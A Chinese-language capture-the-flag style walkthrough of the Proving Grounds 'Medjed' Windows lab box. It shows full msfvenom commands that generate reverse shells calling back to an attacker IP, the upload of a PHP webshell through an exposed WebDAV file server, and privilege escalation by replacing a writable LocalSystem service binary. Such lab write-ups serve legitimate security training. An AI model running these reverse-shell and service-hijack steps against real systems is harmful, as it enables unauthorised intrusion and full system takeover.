Difficulty

Medium

Scans

autorecon

[*] msrpc found on tcp/135.

[*] netbios-ssn found on tcp/139.

[*] microsoft-ds found on tcp/445.


[*] mysql found on tcp/3306.
    MariaDB


[*] http-alt found on tcp/8000.
    Server: BarracudaServer.com (Windows)
    + OPTIONS: WebDAV enabled (MKCOL LOCK COPY PROPPATCH PROPFIND UNLOCK listed as allowed).

[*] unknown found on tcp/5040.

[*] ftp found on tcp/30021.
    FileZilla ftpd 0.9.41 beta
    可匿名登录

[*] unknown found on tcp/33033.
    sugid

[*] unknown found on tcp/44330.
    ssl: 8000


[*] http found on tcp/45332.
    Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.3.23)
    Quiz App
    http://192.168.111.127:45332/phpinfo.php
        Loaded Configuration File        C:\xampp\php\php.ini
        Zend Engine v3.3.23
        TMP        \xampp\tmp
        SQLite Library        3.28.0


[*] http found on tcp/45443.
    Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23
    seems like 45332

[*] msrpc found on tcp/49664.
[*] msrpc found on tcp/49665.
[*] msrpc found on tcp/49666.
[*] msrpc found on tcp/49667.
[*] msrpc found on tcp/49668.
[*] msrpc found on tcp/49669.

445 smb

匿名用户无法登录

30021 ftp

可以匿名登录, 看起来是一个project, 使用lft命令全部下载 lftp -e "mirror -c -e / ftp" ``ftp://192.168.111.127:30021, 但是没有找到什么有价值信息

ftp -a -A 192.168.111.127 -p 30021
Connected to 192.168.111.127.
220-FileZilla Server version 0.9.41 beta
220-written by Tim Kosse ([email protected])
220 Please visit http://sourceforge.net/projects/filezilla/
331 Password required for anonymous
230 Logged on
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||49905|)
150 Connection accepted
-r--r--r-- 1 ftp ftp            536 Nov 03  2020 .gitignore
drwxr-xr-x 1 ftp ftp              0 Nov 03  2020 app
drwxr-xr-x 1 ftp ftp              0 Nov 03  2020 bin
drwxr-xr-x 1 ftp ftp              0 Nov 03  2020 config
-r--r--r-- 1 ftp ftp            130 Nov 03  2020 config.ru
drwxr-xr-x 1 ftp ftp              0 Nov 03  2020 db
-r--r--r-- 1 ftp ftp           1750 Nov 03  2020 Gemfile
drwxr-xr-x 1 ftp ftp              0 Nov 03  2020 lib
drwxr-xr-x 1 ftp ftp              0 Nov 03  2020 log
-r--r--r-- 1 ftp ftp             66 Nov 03  2020 package.json
drwxr-xr-x 1 ftp ftp              0 Nov 03  2020 public
-r--r--r-- 1 ftp ftp            227 Nov 03  2020 Rakefile
-r--r--r-- 1 ftp ftp            374 Nov 03  2020 README.md
drwxr-xr-x 1 ftp ftp              0 Nov 03  2020 test
drwxr-xr-x 1 ftp ftp              0 Nov 03  2020 tmp
drwxr-xr-x 1 ftp ftp              0 Nov 03  2020 vendor
226 Transfer OK
ftp>

8000/44330 BarracudaServer

nikto -ask=no -Tuning=x4567890ac -nointeractive -host ``http://192.168.111.127:8000`` 2>&1结果提示webdav enabled, 可以尝试利用上传文件。

浏览器打开链接，about 页面发现版本号 BarracudaDrive 6.5

searchsploit BarracudaDrive

查看Description部分，是因为bd service 是localSystem执行的，如果可以替换bd.exe重启以后可以实现提权，很有用的信息，等下提权的时候试下。

33033

发现了一些用户名，保存下来，后续可能有用，右上角login进入登录页面，登录页面有forget password按钮

输入用户名、助记词、新密码可以重置密码，试了上面的用户名和他们的slogan, 没有成功。（实际上题解的利用方式就是重置了jerren的密码，Reminder是paranoid, 是slogan中的关键词，然后利用sql注入写websell)

45332/45443

nikto发现phpinfo.php, gobuster使用的字典没有扫到

Foothold

继续看下webdav, 访问 https://192.168.111.127:44330/会弹出set administraor account页面，输入admin:password, email随意。然后进入web-file-server

点击fs进入https://192.168.111.127:44330/fs/然后发现可以访问任意目录, 然后根据 45332端口的phpinfo中目录信息来到 https://192.168.111.127:44330/fs/c/xampp/htdocs/, msfvenom -p php/reverse_php LHOST=192.168.45.165 LPORT=8000 -f raw -o r.php 生成webshell上传，请求后得到webshell

rlwrap nc -nvlp 8000
listening on [any] 8000 ...
connect to [192.168.45.165] from (UNKNOWN) [192.168.111.127] 49886
whoami
medjed\jerren

Escalation

按照48789.txt的步骤检查bd service和bd.exe权限，完全符合，直接 msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.165 LPORT=443 -f exe -o bd.exe 替换bd.exe, 然后 shutdown /r /t 0 重启，然后得到webshell

## Insecure Folder Permission
C:\>cacls C:\bd
C:\bd BUILTIN\Administrators:(OI)(CI)(ID)F
      NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
      BUILTIN\Users:(OI)(CI)(ID)R
      NT AUTHORITY\Authenticated Users:(ID)C
      NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C

## Insecure File/Service Permission
C:\>cacls C:\bd\bd.exe
C:\bd\bd.exe BUILTIN\Administrators:(ID)F
             NT AUTHORITY\SYSTEM:(ID)F
             BUILTIN\Users:(ID)R
             NT AUTHORITY\Authenticated Users:(ID)C

C:\>sc qc bd
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: bd
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\bd\bd.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : BarracudaDrive ( bd ) service
        DEPENDENCIES       : Tcpip
        SERVICE_START_NAME : LocalSystem

rlwrap nc -nvlp 443
listening on [any] 443 ...

connect to [192.168.45.165] from (UNKNOWN) [192.168.111.127] 49668
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>
C:\WINDOWS\system32>whoami
whoami
nt authority\system

临渊羡鱼

Proving Grounds Practice - Medjed